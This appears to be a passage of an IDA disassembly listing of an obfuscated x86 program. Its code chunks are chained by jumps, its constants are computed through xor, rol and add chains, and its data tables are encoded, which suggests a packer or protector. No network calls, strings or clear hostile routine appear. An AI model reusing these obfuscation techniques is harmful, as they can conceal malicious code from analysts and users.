jmp loc_451FB0
sub_45114D endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_401. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459C1B
loc_45115F: ; CODE XREF: sub_459C1B+14j
jmp loc_454E35
; END OF FUNCTION CHUNK FOR sub_459C1B
; ---------------------------------------------------------------------------
loc_451164: ; CODE XREF: ut7h7i2x:0044E74Aj
shr esi, 8
jmp loc_44916E
; ---------------------------------------------------------------------------
loc_45116C: ; DATA XREF: sub_458362+2298o
mov eax, [ebp+8]
test byte ptr [eax-8], 8
; START OF FUNCTION CHUNK FOR sub_44F738
loc_451173: ; CODE XREF: sub_44F738:loc_44C54Ej
setnz al
call sub_45A2AD
push offset sub_43A80F
jmp nullsub_467
; END OF FUNCTION CHUNK FOR sub_44F738
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_451185: ; CODE XREF: sub_4524FE-19349j
test ecx, 35AFE8F4h
jmp loc_452EA8
; END OF FUNCTION CHUNK FOR sub_4524FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4492A1
loc_451190: ; CODE XREF: sub_4492A1+11B8j
adc esi, 799FAA5Fh
jmp loc_444619
; END OF FUNCTION CHUNK FOR sub_4492A1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_45119B: ; CODE XREF: sub_457A66-14E49j
add edx, ebx
and eax, 9B80B342h
xchg eax, esi
jmp loc_44B519
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_4511AA: ; CODE XREF: sub_457A45:loc_44BE64j
; sub_4462B0:loc_45180Dj
jnz loc_43F4D8
jmp loc_4547AA
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D066
loc_4511B5: ; CODE XREF: sub_44D066:loc_44D078j
xor eax, 18EB5864h
rol eax, 1Ch
or eax, 99CDA921h
rol eax, 1
xor eax, 124A5FDEh
call sub_43AA94
push offset sub_44E8A5
jmp loc_44CF5D
; END OF FUNCTION CHUNK FOR sub_44D066
; ---------------------------------------------------------------------------
loc_4511DB: ; CODE XREF: ut7h7i2x:00458710j
push 17745301h
loc_4511E0: ; CODE XREF: ut7h7i2x:loc_4586EEj
xor edx, ds:4000F1h
cmp edx, 8B756C9Eh
jmp loc_44F359
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458345
loc_4511F1: ; CODE XREF: sub_458345:loc_43E576j
jz loc_456EB1
jmp loc_44601C
; END OF FUNCTION CHUNK FOR sub_458345
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445B07
loc_4511FC: ; CODE XREF: sub_445B07:loc_44675Bj
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jz loc_45418A
call sub_44B526
loc_45120E: ; CODE XREF: sub_4390DE+1F5C5j
add eax, 0F6C0AD33h
xchg eax, [esp+128h+var_128]
jmp sub_43F7A5
; END OF FUNCTION CHUNK FOR sub_445B07
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_45121C proc near ; DATA XREF: sub_445FEA+Bo
jmp sub_4044D2
sub_45121C endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_502. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov ebp, esp
jns loc_441147
add esp, 0FFFFFFCCh
jmp loc_4418A6
; ---------------------------------------------------------------------------
locret_451232: ; CODE XREF: ut7h7i2x:00450C8Aj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E6B4
loc_451233: ; CODE XREF: sub_44E6B4:loc_44959Ej
jmp loc_43FEF4
; END OF FUNCTION CHUNK FOR sub_44E6B4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BA9E
loc_451238: ; CODE XREF: sub_43BA9E+11j
jmp loc_4599FA
; END OF FUNCTION CHUNK FOR sub_43BA9E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D0E5
loc_45123D: ; CODE XREF: sub_44D0E5+15j
sub ebx, 0EADB3233h
add ebx, 141FBF4h
xchg ebx, [esp+4+var_4]
jmp sub_43BA59
; END OF FUNCTION CHUNK FOR sub_44D0E5
; ---------------------------------------------------------------------------
loc_451251: ; DATA XREF: sub_44D9A0+6o
push edx
push 86EEF5B1h
pop edx
sub edx, 0FEEA7951h
add edx, 6FE91577h
or edx, 0E7DABF73h
jmp loc_4566B4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447F0A
loc_45126F: ; CODE XREF: sub_447F0A+E56Ej
mov edx, [edx]
sub edx, eax
mov ecx, [ebp-4]
push 0C1335C46h
pop eax
rol eax, 18h
jmp loc_43E9E8
; END OF FUNCTION CHUNK FOR sub_447F0A
; =============== S U B R O U T I N E =======================================
sub_451284 proc near ; DATA XREF: sub_43A956+F73Eo
; FUNCTION CHUNK AT 0044C390 SIZE 0000000A BYTES
add edi, 0C458BE1h
xor eax, edi
pop edi
ror eax, 8
jmp loc_44C390
sub_451284 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_451295: ; CODE XREF: sub_444EAA-4347j
pushf
loc_451296: ; CODE XREF: sub_444EAA:loc_44E3F0j
call sub_453D8B
mov edx, 0BE8CE1B7h
call sub_44ED9F
mov [ebp-4], eax
jmp loc_448D64
; END OF FUNCTION CHUNK FOR sub_444EAA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457F2D
loc_4512AD: ; CODE XREF: sub_457F2D:loc_43F656j
mov eax, 0E5254649h
call sub_43AA94
mov ds:dword_41D0E0, eax
call sub_4598B4
; END OF FUNCTION CHUNK FOR sub_457F2D
; START OF FUNCTION CHUNK FOR sub_452AE2
loc_4512C2: ; CODE XREF: sub_452AE2+Cj
jmp loc_449DE3
; END OF FUNCTION CHUNK FOR sub_452AE2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_4512C7: ; CODE XREF: sub_439BF8+165F6j
jle loc_44AC00
jno loc_455EEC
jp loc_43E604
xor edx, 6C79ADDFh
mov esi, ebx
jmp loc_451DDA
; END OF FUNCTION CHUNK FOR sub_439BF8
; =============== S U B R O U T I N E =======================================
sub_4512E6 proc near ; CODE XREF: sub_450E81j
; DATA XREF: sub_43A513:loc_450E77o
; FUNCTION CHUNK AT 00441089 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004535F1 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00457A5C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A6DB SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045AD04 SIZE 0000000B BYTES
xchg eax, [esp+0]
mov edx, eax
push esi
push 285C3A23h
pop esi
add esi, 698DA5CCh
test esi, 8
jmp loc_45A6DB
sub_4512E6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_451303: ; CODE XREF: sub_43FF65:loc_43F6D2j
push 0EBDBD49Dh
pop eax
and eax, 7F5FBB1Dh
add eax, 94E8DDB8h
xchg eax, [esp+0]
jmp loc_44FD09
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
loc_45131D: ; CODE XREF: ut7h7i2x:loc_439CC1j
rol ecx, 0Bh
add ecx, 0D5E199F6h
add eax, ecx
pop ecx
xor eax, 167BADEFh
add eax, 94795D94h
xor eax, 0AB06A5FAh
jmp loc_4423A4
; ---------------------------------------------------------------------------
mov eax, 0CE6B079Ah
push ebx
push 0C77ADF77h
pop ebx
jmp loc_442499
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443A45
loc_451351: ; CODE XREF: sub_443A45-85D2j
mov [eax], ebx
jg loc_4490C5
jp loc_441E84
jmp loc_44B420
; END OF FUNCTION CHUNK FOR sub_443A45
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451971
loc_451364: ; CODE XREF: sub_451971:loc_447C07j
xor edi, 6D4AA006h
add edi, 0EE85B88Ch
test edi, 10h
jmp loc_459BA8
; END OF FUNCTION CHUNK FOR sub_451971
; ---------------------------------------------------------------------------
loc_45137B: ; CODE XREF: ut7h7i2x:0043CEACj
mov [eax], ebx
; =============== S U B R O U T I N E =======================================
sub_45137D proc near ; CODE XREF: ut7h7i2x:0044EFB0p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0044A63E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454E4A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004562BE SIZE 00000014 BYTES
xchg eax, [esp+0]
pop eax
push 4D55DF8h
pop ebx
and ebx, 6B34F902h
add ebx, 8183FC7Bh
jmp loc_454E4A
sub_45137D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_451398: ; CODE XREF: sub_43A556:loc_4544D5j
jnz loc_43EE42
jmp loc_454F8C
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
db 95h
dword_4513A4 dd 153940h ; DATA XREF: sub_447F0A-BD02r
; sub_44EB88+Er ...
; ---------------------------------------------------------------------------
loc_4513A8: ; CODE XREF: ut7h7i2x:00453B3Fj
jmp loc_456767
; ---------------------------------------------------------------------------
db 82h, 0C0h, 32h
off_4513B0 dd offset off_41D000 ; DATA XREF: ut7h7i2x:loc_43F222o
; ut7h7i2x:loc_459B30o
dd 13h, 50h, 5Bh, 170h, 1, 8, 5, 18h, 1, 8, 9, 28h, 3
dd 10h, 19h, 2 dup(0)
; ---------------------------------------------------------------------------
loc_4513F8: ; CODE XREF: ut7h7i2x:004531E1j
jmp loc_45AD88
; ---------------------------------------------------------------------------
loc_4513FD: ; CODE XREF: ut7h7i2x:00443E6Cj
jmp nullsub_14
; ---------------------------------------------------------------------------
loc_451402: ; CODE XREF: ut7h7i2x:0043E797j
jmp loc_459150
; ---------------------------------------------------------------------------
loc_451407: ; CODE XREF: ut7h7i2x:0043BF25j
jmp locret_44C34B
; ---------------------------------------------------------------------------
dd 1070000h, 471051C1h, 0FFFF8010h, 0Bh, 0FFFF8010h, 1Fh
dd 0FFFF8010h, 18h, 0FFFF8010h, 29h, 0FFFF8010h, 4Bh, 0FFFF801Fh
dd 17h, 0FFFF801Fh, 33h, 0FFFF801Fh, 13h, 0FFFF801Fh, 65h
dd 0FFFF801Fh, 0Dh, 0FFFF801Fh, 1, 0FFFF801Fh, 6, 0FFFF801Fh
dd 4, 0FFFF801Fh, 74h, 0FFFF801Fh, 34h, 0FFFF801Fh, 14h
dd 0FFFF801Fh, 15h, 0FFFF801Fh, 0Fh, 0FFFF801Fh, 12h, 0FFFF801Fh
dd 11h, 0FFFF801Fh, 0Ch, 0FFFF801Fh, 97h, 0FFFF801Fh, 0Bh
dd 0FFFF801Fh, 0Ah, 0FFFF801Fh, 10h, 0FFFF801Fh, 9, 0FFFF801Fh
dd 73h, 0FFFF801Fh, 5, 0FFFF801Fh, 2, 0FFFF801Fh, 3, 9E002Eh
dd 801D01A0h, 97002Eh, 609D577Dh, 96002Eh, 0B24C760Ah
dd 6003Eh, 2092F37Fh
dword_451524 dd 773D0000h, 89A2429Ah, 2E3233C4h, 0D8B119h, 1F7B0000h
; DATA XREF: sub_451F39-6D9Bo
dd 6884887Ah, 46719133h, 6CC6h, 0BA71AB00h, 99EB646Ah
dd 0B1C85C46h, 8Dh, 29BA7620h, 154E5293h, 36C87115h, 0B1h
dd 506A71B2h, 6346B825h
db 63h, 0
; ---------------------------------------------------------------------------
loc_45156E: ; CODE XREF: ut7h7i2x:004541BAj
jmp sub_43D87A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4455F4
loc_451573: ; CODE XREF: sub_4455F4+930Cj
jmp sub_451B63
; END OF FUNCTION CHUNK FOR sub_4455F4
; ---------------------------------------------------------------------------
push ebp
jmp loc_452F13
; ---------------------------------------------------------------------------
or ebx, ecx
jmp sub_458937
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439701
loc_451585: ; CODE XREF: sub_439701:loc_448258j
call sub_44917B
loc_45158A: ; CODE XREF: sub_444273+44CFj
jmp loc_445B69
; END OF FUNCTION CHUNK FOR sub_439701
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D364
loc_45158F: ; CODE XREF: sub_43D364:loc_43D53Aj
push 6A935C1Fh
pop edi
and edi, 0E9AE6976h
or edi, 9A69442Ch
sub edi, 12FEDC4Ah
jnb loc_45517E
test esi, 37C82DF7h
jmp loc_440A2F
; END OF FUNCTION CHUNK FOR sub_43D364
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FCEE
loc_4515B8: ; CODE XREF: sub_43FCEE:loc_43D837j
pop esi
sub esi, 76ECD92h
xor esi, 2FC1D525h
add edx, esi
pop esi
mov edx, [edx]
imul byte ptr [edx]
jmp loc_44B91F
; END OF FUNCTION CHUNK FOR sub_43FCEE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E26
loc_4515D1: ; CODE XREF: sub_453E26-14DBAj
jo loc_448B1F
jmp loc_446F02
; END OF FUNCTION CHUNK FOR sub_453E26
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_4515DC: ; CODE XREF: sub_449E96-76D0j
sub eax, 689032Eh
jnz loc_445C1A
loc_4515E8: ; CODE XREF: sub_448321+E74Ej
jmp loc_4460F8
; END OF FUNCTION CHUNK FOR sub_449E96
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447F8A
loc_4515ED: ; CODE XREF: sub_447F8A+9861j
jmp loc_448D06
; END OF FUNCTION CHUNK FOR sub_447F8A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440AF2
loc_4515F2: ; CODE XREF: sub_440AF2+1Dj
jmp loc_439B50
; END OF FUNCTION CHUNK FOR sub_440AF2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_4515F7: ; CODE XREF: sub_44EC11-13678j
jmp loc_43E882
; END OF FUNCTION CHUNK FOR sub_44EC11
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A27F
loc_4515FC: ; CODE XREF: sub_43A27F+9j
jmp sub_449D3B
; END OF FUNCTION CHUNK FOR sub_43A27F
; ---------------------------------------------------------------------------
jle loc_43B9DA
add ecx, ebx
sub edx, eax
push eax
jmp loc_445C17
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443C4A
loc_451611: ; CODE XREF: sub_443C4A:loc_45643Aj
jz loc_453DF3
loc_451617: ; CODE XREF: sub_44DD56:loc_4395A8j
jmp loc_44DBCC
; END OF FUNCTION CHUNK FOR sub_443C4A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44602A
loc_45161C: ; CODE XREF: sub_44602A-3098j
call sub_454196
mov esp, ebp
xchg esi, [esp+0]
push offset loc_448EFF
jmp nullsub_235
; END OF FUNCTION CHUNK FOR sub_44602A
; ---------------------------------------------------------------------------
mov eax, 9E471775h
push ebx
push 0F86B0FFBh
pop ebx
or ebx, 0CD46E309h
sub ebx, ds:4000F7h
test ebx, 2000h
jmp loc_4571E3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459081
loc_451653: ; CODE XREF: sub_459081+Dj
; sub_459081+15j
and eax, 887289BBh
xor eax, 5B714E9Fh
add eax, 2D1378AEh
xchg eax, [esp+0]
jmp loc_4531A8
; END OF FUNCTION CHUNK FOR sub_459081
; ---------------------------------------------------------------------------
loc_45166D: ; CODE XREF: ut7h7i2x:loc_457D1Dj
xchg eax, [esp]
jmp nullsub_151
; ---------------------------------------------------------------------------
loc_451675: ; CODE XREF: ut7h7i2x:00447EFBj
add dword ptr [ebp-8], 2
jmp loc_451A20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A513
loc_45167E: ; CODE XREF: sub_43A513+116C9j
; sub_43A513+12994j
test byte ptr [ebp-8], 20h
jz loc_44CF30
push ebp
jmp loc_43A36B
; END OF FUNCTION CHUNK FOR sub_43A513
; =============== S U B R O U T I N E =======================================
sub_45168E proc near ; DATA XREF: sub_449808-193Co
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043D5DA SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044FA27 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045972C SIZE 00000020 BYTES
pop edx
mov eax, [esp-4+arg_0]
push edx
push eax
push 0C9000BF0h
jmp loc_44FA27
sub_45168E endp
; ---------------------------------------------------------------------------
loc_45169E: ; CODE XREF: ut7h7i2x:loc_43BB3Aj
; DATA XREF: sub_43FCEE:loc_43D9D7o
xchg edi, [esp]
mov ecx, edi
pop edi
pop ebp
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D255
loc_4516A6: ; CODE XREF: sub_44D255+14j
jmp loc_446A6B
; END OF FUNCTION CHUNK FOR sub_44D255
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F094
loc_4516AB: ; CODE XREF: sub_43F094+17j
jmp loc_446774
; END OF FUNCTION CHUNK FOR sub_43F094
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44081E
loc_4516B0: ; CODE XREF: sub_44081E:loc_44BCC6j
; ut7h7i2x:loc_45A201j
jnz loc_441F49
jmp loc_439C5D
; END OF FUNCTION CHUNK FOR sub_44081E
; ---------------------------------------------------------------------------
loc_4516BB: ; CODE XREF: ut7h7i2x:0043953Cj
jz loc_45274B
jmp loc_439A32
; =============== S U B R O U T I N E =======================================
sub_4516C6 proc near ; CODE XREF: ut7h7i2x:loc_43A23Aj
; sub_449E96-DBCDp ...
; FUNCTION CHUNK AT 0043FE24 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0045482C SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0045540F SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
mov eax, [ebp+8]
push ecx
mov ecx, eax
xchg ecx, [esp+0]
push ecx
jmp loc_45540F
sub_4516C6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453D07
loc_4516D9: ; CODE XREF: sub_453D07+9j
call sub_44A4C0
cmp ds:dword_43E36C, 0
jnz loc_440EBB
lea edx, [ebp-14h]
mov eax, offset dword_43E380
call sub_43F058
jmp loc_43CAE5
; END OF FUNCTION CHUNK FOR sub_453D07
; ---------------------------------------------------------------------------
loc_4516FD: ; CODE XREF: ut7h7i2x:loc_44A71Cj
; ut7h7i2x:0044A72Bj
sub ecx, 4A50A065h
xor ecx, 0B4BA146Eh
cmp ecx, 53DB46F9h
jmp loc_43D2C4
; ---------------------------------------------------------------------------
loc_451714: ; DATA XREF: sub_44EFC6+1o
pushf
push 0BE21930Dh
pop ebx
and ebx, 47083046h
or ebx, 2B12F93Ch
rol ebx, 9
jmp loc_4520A0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_45172F: ; CODE XREF: sub_439BF8:loc_442EF0j
jnz loc_44A583
jmp loc_43CCDB
; END OF FUNCTION CHUNK FOR sub_439BF8
; =============== S U B R O U T I N E =======================================
sub_45173A proc near ; CODE XREF: sub_455060-152A4p
; sub_45A599-F627p ...
var_4 = dword ptr -4
push eax
mov eax, ebp
xchg eax, [esp+4+var_4]
call sub_458CA4
loc_451745: ; CODE XREF: ut7h7i2x:0045485Bj
jmp nullsub_131
sub_45173A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449EE1
loc_45174A: ; CODE XREF: sub_449EE1+BAB7j
mov eax, 320057C2h
call sub_446F9A
loc_451754: ; CODE XREF: sub_44C791-B07Ej
jmp nullsub_231
; END OF FUNCTION CHUNK FOR sub_449EE1
; =============== S U B R O U T I N E =======================================
sub_451759 proc near ; DATA XREF: sub_45459E+5B4Bo
push 26D0B795h
pop eax
or eax, 6C4B4D19h
xor eax, 0E273C1B1h
call sub_43AED9
jmp loc_4456DC
sub_451759 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456944
loc_451775: ; CODE XREF: sub_456944-5BB9j
xor eax, 0DE3D9267h
call sub_43AA94
; END OF FUNCTION CHUNK FOR sub_456944
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_451780: ; CODE XREF: sub_4529E0:loc_44EB15j
push esi
push 0FB859880h
pop esi
add esi, 0E5640E46h
and esi, 0E5FA32BAh
xor esi, 0A34B7F98h
jmp loc_451FC0
; END OF FUNCTION CHUNK FOR sub_4529E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_45179E: ; CODE XREF: sub_43CAF4:loc_43A750j
; sub_43CAF4+F24Ej ...
xchg eax, [esp+0]
call sub_444C41
loc_4517A6: ; CODE XREF: sub_455060-BFFj
jmp loc_43BE70
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445FA9
loc_4517AB: ; CODE XREF: sub_445FA9+9B2Ej
jmp loc_442328
; END OF FUNCTION CHUNK FOR sub_445FA9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_192. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453188
loc_4517B1: ; CODE XREF: sub_453188-83F8j
jmp loc_44BDD9
; END OF FUNCTION CHUNK FOR sub_453188
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_4517B6: ; CODE XREF: sub_4433C5+4249j
jmp loc_44CBFD
; END OF FUNCTION CHUNK FOR sub_4433C5
; ---------------------------------------------------------------------------
mov [ebx], esi
jmp sub_4586CB
; ---------------------------------------------------------------------------
loc_4517C2: ; DATA XREF: ut7h7i2x:0045583Do
xor eax, eax
mov ds:dword_4487C4, eax
jmp loc_456F6B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C273
loc_4517CE: ; CODE XREF: sub_44C273:loc_4569A7j
push ecx
push 0A867936Bh
jmp loc_454FBE
; END OF FUNCTION CHUNK FOR sub_44C273
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_158. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447F8A
loc_4517DA: ; CODE XREF: sub_447F8A-D3A1j
mov eax, [ebp+8]
cmp dword ptr [eax-0Ch], 4
jnz loc_4517F0
add dword ptr [ebp-8], 4
jmp loc_4515ED
; ---------------------------------------------------------------------------
loc_4517F0: ; CODE XREF: sub_447F8A+9857j
add dword ptr [ebp-8], 2
jmp loc_448D06
; END OF FUNCTION CHUNK FOR sub_447F8A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4589C7
loc_4517F9: ; CODE XREF: sub_4589C7+138Aj
mov ecx, ebp
pop ebp
pop ebx
pop edx
jmp loc_443E49
; END OF FUNCTION CHUNK FOR sub_4589C7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E68B
loc_451803: ; CODE XREF: sub_43E68B+B31Ej
; sub_43E68B:loc_45902Bj
push offset loc_45AE04
jmp nullsub_371
; END OF FUNCTION CHUNK FOR sub_43E68B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_45180D: ; CODE XREF: sub_4462B0+4EB2j
jge loc_4511AA
jle loc_448238
loc_451819: ; CODE XREF: sub_4462B0:loc_448827j
push 13FE2FB9h
pop eax
or eax, 535F9128h
jmp loc_454439
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
loc_45182A: ; CODE XREF: ut7h7i2x:00449E7Cj
mov ds:dword_43A07C+4, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459A71
loc_451831: ; CODE XREF: sub_459A71-DED3j
jmp sub_44F774
; END OF FUNCTION CHUNK FOR sub_459A71
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_451836: ; CODE XREF: sub_43CCC3+E70Aj
jmp loc_4573A0
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D5BE
loc_45183B: ; CODE XREF: sub_44D5BE:loc_44A4E5j
rol eax, 1Ch
loc_45183E: ; CODE XREF: ut7h7i2x:loc_4420EAj
push ecx
mov ecx, eax
loc_451841: ; CODE XREF: ut7h7i2x:0045322Fj
xchg ecx, [esp-4+arg_0]
jmp loc_442B27
; END OF FUNCTION CHUNK FOR sub_44D5BE
; ---------------------------------------------------------------------------
loc_451849: ; CODE XREF: ut7h7i2x:loc_45251Aj
call sub_4580CF
test eax, eax
jz loc_456678
jmp loc_447C61
; ---------------------------------------------------------------------------
sbb edi, 229A2CF9h
jmp sub_45A693
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E592
loc_451866: ; CODE XREF: sub_43E592+12j
and ebx, eax
loc_451868: ; CODE XREF: ut7h7i2x:loc_457E5Bj
call sub_440E38
jnz loc_455377
add ebx, eax
mov eax, ds:dword_4513A4
mov [eax], ebx
mov eax, offset dword_442EB4
call sub_442262
jmp loc_43A8EF
; END OF FUNCTION CHUNK FOR sub_43E592
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45AB7D
loc_45188B: ; CODE XREF: sub_45AB7D:loc_4504D2j
xor edi, 90831886h
add edi, 0C858B139h
xchg edi, [esp+0]
jmp loc_44A9B6
; END OF FUNCTION CHUNK FOR sub_45AB7D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44101A
loc_45189F: ; CODE XREF: sub_44101A:loc_4441B6j
push 11B6E905h
pop eax
and eax, 899FF447h
xor eax, 0B3912178h
add ecx, eax
pop eax
mov ecx, [ecx]
and ecx, 7
jmp loc_44566E
; END OF FUNCTION CHUNK FOR sub_44101A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45742F
loc_4518BE: ; CODE XREF: sub_45742F:loc_4450D1j
pushf
push 0F192C2B5h
pop edx
and edx, 2DB0FEA3h
jmp loc_448A40
; END OF FUNCTION CHUNK FOR sub_45742F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448CBC
loc_4518D0: ; CODE XREF: sub_448CBC-C30Fj
jnz loc_457224
pushf
; END OF FUNCTION CHUNK FOR sub_448CBC
; =============== S U B R O U T I N E =======================================
sub_4518D7 proc near ; CODE XREF: sub_448CBC:loc_4531B7j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 0043B1BC SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043ED64 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043F0CB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441FB4 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00443B70 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443C8C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004473B7 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044A069 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BA71 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044FCB8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451FAA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455512 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00457693 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457B26 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00457D7B SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004582B9 SIZE 00000005 BYTES
push ebx
push 382DA91Dh
jmp loc_4473B7
sub_4518D7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4518E2: ; CODE XREF: ut7h7i2x:00448279j
or ebp, eax
mov eax, ebx
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_4518E6: ; CODE XREF: sub_43AB62+2205j
; sub_44E5DC-DB86j ...
jmp loc_441FD5
; ---------------------------------------------------------------------------
loc_4518EB: ; CODE XREF: sub_43AB62+154AAj
; ut7h7i2x:0045A5E5j
xchg eax, [esp+0]
push eax
pop ecx
pop eax
call sub_44469C
loc_4518F6: ; CODE XREF: ut7h7i2x:00457CE6j
jmp loc_44B8ED
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_4518FB: ; CODE XREF: sub_43D021+61BEj
jmp loc_4525C3
; END OF FUNCTION CHUNK FOR sub_43D021
; =============== S U B R O U T I N E =======================================
sub_451900 proc near ; CODE XREF: sub_44AD25+19p
; ut7h7i2x:00457920j
; FUNCTION CHUNK AT 004478C6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449D87 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044BCC1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451D61 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458DE4 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045A5D2 SIZE 00000010 BYTES
xchg esi, [esp+0]
pop esi
add eax, ebp
